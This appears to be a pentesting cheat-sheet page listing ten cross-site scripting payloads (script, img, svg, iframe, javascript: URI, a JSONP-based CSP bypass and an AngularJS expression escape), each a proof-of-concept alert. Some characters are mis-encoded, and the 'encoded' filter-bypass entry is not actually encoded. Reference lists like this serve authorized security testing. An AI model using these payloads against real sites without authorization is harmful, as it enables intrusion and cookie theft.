Payload Library
Curated offensive payloads for authorized penetration testing
โ
XSS PAYLOADS โ 10
Basic script tag
<script>alert('XSS')</script>IMG onerror
<img src=x onerror=alert(1)>SVG onload
<svg onload=alert(document.cookie)>Details ontoggle
<details open ontoggle=alert(1)>DOM-based (href)
javascript:alert(document.domain)Filter bypass (encoded)
<script>alert(1)</script>CSP bypass via JSONP
<script src=https://cdn.jsdelivr.net/callback=alert></script>โน Requires CSP allowing CDN
Data URI
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>Template literal
${alert(1)}Angular ng-src
{{constructor.constructor('alert(1)')()}}โน AngularJS 1.x SSTI